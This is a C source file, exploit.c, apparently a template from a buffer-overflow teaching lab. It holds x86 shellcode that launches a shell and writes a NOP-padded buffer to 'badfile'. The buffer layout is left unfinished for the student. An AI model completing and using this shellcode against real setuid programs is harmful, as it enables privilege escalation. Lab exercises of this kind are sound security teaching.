40 lines
961 B
C
40 lines
961 B
C
|
/* exploit.c */
|
||
|
|
|
||
|
|
/* A program that creates a file containing code for launching shell*/
|
||
|
|
|
||
|
|
#include <stdlib.h>
|
||
|
|
#include <stdio.h>
|
||
|
|
#include <string.h>
|
||
|
|
|
||
|
|
char shellcode[]=
|
||
|
|
"\x31\xc0" /* xorl %eax,%eax */
|
||
|
|
"\x50" /* pushl %eax */
|
||
|
|
"\x68""/zsh" /* pushl $0x68732f2f */
|
||
|
|
"\x68""/bin" /* pushl $0x6e69622f */
|
||
|
|
"\x89\xe3" /* movl %esp,%ebx */
|
||
|
|
"\x50" /* pushl %eax */
|
||
|
|
"\x53" /* pushl %ebx */
|
||
|
|
"\x89\xe1" /* movl %esp,%ecx */
|
||
|
|
"\x99" /* cdql */
|
||
|
|
"\xb0\x0b" /* movb $0x0b,%al */
|
||
|
|
"\xcd\x80" /* int $0x80 */
|
||
|
|
;
|
||
|
|
|
||
|
|
int main(int argc, char **argv)
|
||
|
|
{
|
||
|
|
char buffer[517];
|
||
|
|
FILE *badfile;
|
||
|
|
|
||
|
|
/* Initialize buffer with 0x90 (NOP instruction) */
|
||
|
|
memset(&buffer, 0x90, 517);
|
||
|
|
|
||
|
|
/* You need to fill the buffer with appropriate contents here */
|
||
|
|
strcpy(buffer, shellcode);
|
||
|
|
|
||
|
|
/* Save the contents to the file "badfile" */
|
||
|
|
badfile = fopen("./badfile", "w");
|
||
|
|
|
||
|
|
fwrite(buffer, 517, 1, badfile);
|
||
|
|
fclose(badfile);
|
||
|
|
}
|